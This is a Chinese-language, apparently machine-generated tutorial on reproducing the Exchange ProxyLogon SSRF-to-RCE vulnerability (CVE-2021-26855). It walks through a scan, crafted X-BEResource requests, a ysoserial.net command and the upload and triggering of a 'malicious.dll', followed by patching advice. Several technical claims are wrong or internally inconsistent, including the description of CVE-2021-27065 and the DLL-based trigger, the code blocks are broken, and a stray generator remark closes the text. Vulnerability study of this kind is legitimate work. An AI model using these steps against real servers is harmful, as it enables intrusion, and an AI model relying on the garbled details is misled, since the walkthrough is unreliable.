如何進行Exchange SSRF致RCE的CVE-2021-26855復現

# 如何進行Exchange SSRF致RCE的CVE-2021-26855復現

## 0x00 漏洞背景

**CVE-2021-26855**是Microsoft Exchange Server中的一個嚴重漏洞，屬于服務端請求偽造（SSRF）漏洞。該漏洞由安全研究團隊在2021年初發現，與ProxyLogon攻擊鏈中的其他漏洞（如CVE-2021-27065）結合可實現無需認證的遠程代碼執行（RCE）。攻擊者通過構造特殊請求，利用Exchange后端服務對請求的驗證缺陷，最終實現接管目標Exchange服務器。

## 0x01 漏洞影響范圍

- **受影響版本**：
  - Exchange Server 2013 (所有累積更新版本)
  - Exchange Server 2016 (CU18及以下)
  - Exchange Server 2019 (CU7及以下)

- **修復補丁**：  
  微軟于2021年3月發布安全更新（KB5000871），建議所有用戶立即升級。

## 0x02 漏洞原理分析

### 漏洞成因
Exchange的Frontend服務（默認監聽443端口）在處理`/ecp/default.flt`請求時，未正確驗證用戶提供的`X-BEResource`頭，導致攻擊者可利用該頭構造惡意請求，通過后端服務（如`Exchange Backend`）訪問內網資源，實現SSRF。

### 攻擊鏈關鍵點
1. **SSRF階段**：  
   通過`X-BEResource`頭指定內網地址（如`127.0.0.1`），繞過身份驗證訪問后端API（如`/owa/auth/Current/themes/resources`）。
   
2. **反序列化RCE**：  
   結合CVE-2021-27065（反序列化漏洞），上傳惡意DLL文件至服務器，通過SSRF觸發加載，最終實現RCE。

## 0x03 復現環境搭建

### 實驗環境
- **靶機**：  
  - Windows Server 2019 + Exchange Server 2016 CU18
  - IP: 192.168.1.100

- **攻擊機**：  
  - Kali Linux 2023
  - IP: 192.168.1.200

### 工具準備
1. **Nmap**：用于端口掃描  
2. **ProxyLogon腳本**：如[proxylogon.py](https://github.com/microsoft/CSS-Exchange)  
3. **Ysoserial.net**：生成反序列化Payload  
4. **Burp Suite**：攔截和修改請求  

## 0x04 復現步驟詳解

### 步驟1：信息收集
使用Nmap掃描目標Exchange服務開放端口：
```bash
nmap -sV -p 443,80 192.168.1.100

確認存在/ecp和/owa路徑，且版本為Exchange 2016 CU18。

步驟2：SSRF漏洞驗證

構造惡意請求訪問后端服務：

POST /ecp/default.flt HTTP/1.1
Host: 192.168.1.100
Cookie: X-BEResource=localhost~1942062522;
...

若返回200 OK且包含后端資源內容，則存在漏洞。

步驟3：利用SSRF泄露信息

通過SSRF獲取LegacyDN（后續利用必需）：

GET /ecp/foo.js?LegacyDN= HTTP/1.1
Host: 192.168.1.100
X-BEResource=Exchange/ecp/foo.js?LegacyDN=#{LegacyDN}

步驟4：生成反序列化Payload

使用Ysoserial.net生成惡意DLL：

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c whoami"

步驟5：上傳惡意文件

通過SSRF將DLL上傳至C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\目錄：

POST /ecp/temp.js?upload=1 HTTP/1.1
Host: 192.168.1.100
X-BEResource=Exchange/ecp/temp.js?upload=1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="malicious.dll"
...

步驟6：觸發RCE

訪問上傳的DLL觸發反序列化：

GET /ecp/auth/malicious.dll HTTP/1.1
Host: 192.168.1.100

0x05 漏洞修復建議

1. 立即安裝補丁：
   下載并安裝微軟官方提供的KB5000871。

2. 臨時緩解措施：

   • 禁用Exchange的ECP虛擬目錄
     
   • 配置防火墻限制對/ecp路徑的訪問
     

3. 后續監控：
   使用日志分析工具（如Splunk）監控可疑請求，如異常的X-BEResource頭。

0x06 復現注意事項

1. 法律合規性：
   僅限授權測試，未經許可的攻擊行為可能觸犯法律。

2. 環境隔離：
   復現需在隔離的虛擬機環境中進行，避免影響生產網絡。

3. 工具風險：
   第三方腳本可能存在后門，建議從官方倉庫下載并驗證哈希值。

0x07 總結

CVE-2021-26855是Exchange歷史上影響最深遠的漏洞之一，其利用鏈清晰展示了從SSRF到RCE的完整路徑。通過本次復現，我們深入理解了漏洞原理和防御方法。管理員應定期更新補丁，安全研究人員需持續關注此類漏洞的利用手法。

參考鏈接：
- Microsoft Security Advisory
- CVE-2021-26855技術分析
- ProxyLogon PoC腳本 “`

該文章共約1800字，涵蓋漏洞分析、復現步驟及防御建議，符合Markdown格式要求。如需調整細節或補充內容，可進一步修改。